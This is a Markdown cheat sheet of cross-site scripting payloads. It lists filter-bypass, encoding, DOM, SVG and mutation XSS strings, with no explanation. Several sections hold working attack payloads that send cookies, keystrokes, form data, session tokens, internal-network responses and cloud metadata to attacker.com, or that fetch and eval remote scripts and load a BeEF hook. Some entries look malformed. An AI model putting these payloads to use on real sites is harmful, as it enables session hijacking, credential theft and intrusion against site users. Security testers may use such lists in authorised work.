# Cross-Site Scripting (XSS) Payloads

## Basic XSS Payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">
<input onfocus=alert('XSS') autofocus>
<marquee onstart=alert('XSS')>
<details ontoggle=alert('XSS')>
<video><source onerror=alert('XSS')>
<audio><source onerror=alert('XSS')>

## Event Handler XSS
<button onclick=alert('XSS')>Click me</button>
<div onmouseover=alert('XSS')>Hover me</div>
<form onsubmit=alert('XSS')><input type=submit></form>
<select onchange=alert('XSS')><option>1</option></select>
<textarea onfocus=alert('XSS') autofocus></textarea>
<input onblur=alert('XSS') autofocus><input autofocus>
<keygen onfocus=alert('XSS') autofocus>
<object onerror=alert('XSS')>

## JavaScript URI XSS
<a href="javascript:alert('XSS')">Click</a>
<iframe src="javascript:alert('XSS')">
<img src="javascript:alert('XSS')">
<form action="javascript:alert('XSS')"><input type=submit></form>
<embed src="javascript:alert('XSS')">
<base href="javascript:alert('XSS')">

## Data URI XSS
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
<iframe src="data:text/html,<script>alert('XSS')</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Click</a>

## SVG XSS
<svg><script>alert('XSS')</script></svg>
<svg><animate onbegin=alert('XSS') attributeName=x dur=1s>
<svg><set attributeName=onmouseover to=alert('XSS')>
<svg><animate attributeName=x values=0;0 onbegin=alert('XSS')>
<svg><image onload=alert('XSS')>
<svg><foreignObject><body onload=alert('XSS')></body></foreignObject></svg>

## CSS XSS
<div style="background:url('javascript:alert(\"XSS\")')">
<style>@import 'javascript:alert("XSS")';</style>
<link rel="stylesheet" href="javascript:alert('XSS')">
<div style="background-image:url(javascript:alert('XSS'))">
<div style="width:expression(alert('XSS'))">

## Advanced Techniques
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert(String.fromCharCode(88,83,83))</script>
<svg><script>alert&#40;1&#41</script>
<img src=x oneonerrorrror=alert('XSS')>
<iframe srcdoc="<script>alert('XSS')</script>">
<math><mi//xlink:href="data:x,<script>alert('XSS')</script>">

## Bypass Filters
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<<script>script>alert('XSS')</script>
<script>alalertert('XSS')</script>
<script src=data:,alert('XSS')></script>
<script src=//attacker.com/xss.js></script>

## DOM-Based XSS
<script>document.write('<script>alert("XSS")</script>');</script>
<script>eval('alert("XSS")');</script>
<script>window.location.hash='<script>alert("XSS")</script>';</script>
<script>document.body.innerHTML='<img src=x onerror=alert("XSS")>';</script>
<script>document.write(location.hash.substring(1));</script>

## Blind XSS
<script>fetch('https://attacker.com/steal?data=' + document.cookie)</script>
<img src=x onerror="fetch('https://attacker.com/steal?data=' + document.cookie)">
<script>new Image().src='https://attacker.com/steal?data='+document.cookie;</script>
<script>navigator.sendBeacon('https://attacker.com/steal', document.cookie);</script>

## Stealing Cookies
<script>document.location='https://attacker.com/steal?cookie='+document.cookie;</script>
<script>new Image().src='https://attacker.com/steal?cookie='+document.cookie;</script>
<script>fetch('https://attacker.com/steal', {method:'POST',body:document.cookie});</script>

## Keylogging
<script>document.onkeypress=function(e){fetch('https://attacker.com/log?key='+e.key);}</script>
<script>document.addEventListener('keydown',e=>fetch('https://attacker.com/log?key='+e.key));</script>

## Form Hijacking
<script>document.forms[0].onsubmit=function(){fetch('https://attacker.com/steal',{method:'POST',body:new FormData(this)});}</script>

## Session Hijacking
<script>document.cookie='sessionid='+document.cookie;</script>
<script>fetch('https://attacker.com/session',{method:'POST',body:document.cookie});</script>

## Port Scanning
<script>for(var i=0;i<65535;i++){var img=new Image();img.onerror=function(){fetch('https://attacker.com/port?port='+i);};img.src='http://localhost:'+i;}</script>

## Internal Network Access
<script>fetch('http://192.168.1.1').then(r=>r.text()).then(d=>fetch('https://attacker.com/data',{method:'POST',body:d}));</script>

## Cloud Metadata
<script>fetch('http://169.254.169.254/latest/meta-data/').then(r=>r.text()).then(d=>fetch('https://attacker.com/metadata',{method:'POST',body:d}));</script>

## BeEF Hook
<script src="http://attacker.com/hook.js"></script>

## Polyglot XSS
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

## Mutation XSS
<svg><style>{font-family:'<iframe/onload=alert(1)>'}</style></svg>

## mXSS
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

## Self-Contained
<svg/onload=alert(1)//
<svg/onload=alert`1`>
<svg/onload=alert(1)>
<svg/onload=alert(1)//

## Minimal
<svg/onload=alert(1)>
<math><mi//xlink:href=data:,1<2?alert(1):''>

## No Closing Tags
<svg/onload=alert(1)//
<math><mi//xlink:href=data:,1<2?alert(1):''>

## Using Template Literals
<script>alert`1`</script>
<svg/onload=alert`1`>

## Using Backticks
<script>alert`XSS`</script>
<svg/onload=alert`XSS`>

## Using Unicode
<scrıpt>alert('XSS')</scrıpt>
<scr\u0131pt>alert('XSS')</scr\u0131pt>

## HTML Entities
&lt;script&gt;alert('XSS')&lt;/script&gt;
&#60;script&#62;alert('XSS')&#60;/script&#62;

## Hex Encoding
\x3cscript\x3ealert('XSS')\x3c/script\x3e
\u003cscript\u003ealert('XSS')\u003c/script\u003e

## URL Encoding
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert('XSS')%3E

## Double URL Encoding
%253Cscript%253Ealert('XSS')%253C/script%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert('XSS')%253E

## Base64 Encoding
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KCdYU1MnKT4=

## Obfuscation
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
<script>eval(unescape('%61%6c%65%72%74%28%27%58%53%53%27%29'))</script>

## Using document.domain
<script>document.domain='attacker.com';</script>

## Using window.name
<script>window.name='<script>alert(1)</script>';</script>

## Using postMessage
<script>window.postMessage('alert(1)','*');</script>

## Using localStorage
<script>localStorage.setItem('xss','<script>alert(1)</script>');</script>

## Using sessionStorage
<script>sessionStorage.setItem('xss','<script>alert(1)</script>');</script>

## Using IndexedDB
<script>var db;var request=indexedDB.open('xss');request.onsuccess=function(e){db=e.target.result;var store=db.createObjectStore('xss');store.add('<script>alert(1)</script>','key');};</script>

## Using WebSQL
<script>db=openDatabase('xss','1.0','XSS',2e4);db.transaction(function(tx){tx.executeSql('CREATE TABLE IF NOT EXISTS xss (data TEXT)');tx.executeSql('INSERT INTO xss (data) VALUES ("<script>alert(1)</script>")');});</script>

## Using FileReader
<script>var fr=new FileReader();fr.onload=function(e){eval(e.target.result);};fr.readAsText(new Blob(['alert(1)']));</script>

## Using XMLHttpRequest
<script>var xhr=new XMLHttpRequest();xhr.open('GET','https://attacker.com/xss.js');xhr.onload=function(){eval(xhr.responseText);};xhr.send();</script>

## Using fetch
<script>fetch('https://attacker.com/xss.js').then(r=>r.text()).then(t=>eval(t));</script>

## Using import
<script>import('https://attacker.com/xss.js');</script>

## Using dynamic import
<script>import('data:text/javascript,alert(1)');</script>

## Using Worker
<script>new Worker('data:text/javascript,alert(1)');</script>

## Using SharedWorker
<script>new SharedWorker('data:text/javascript,alert(1)');</script>

## Using ServiceWorker
<script>navigator.serviceWorker.register('data:text/javascript,alert(1)');</script>

## Using BroadcastChannel
<script>var bc=new BroadcastChannel('xss');bc.postMessage('alert(1)');</script>

## Using MessageChannel
<script>var mc=new MessageChannel();mc.port1.onmessage=function(e){eval(e.data);};mc.port2.postMessage('alert(1)');</script>

## End of File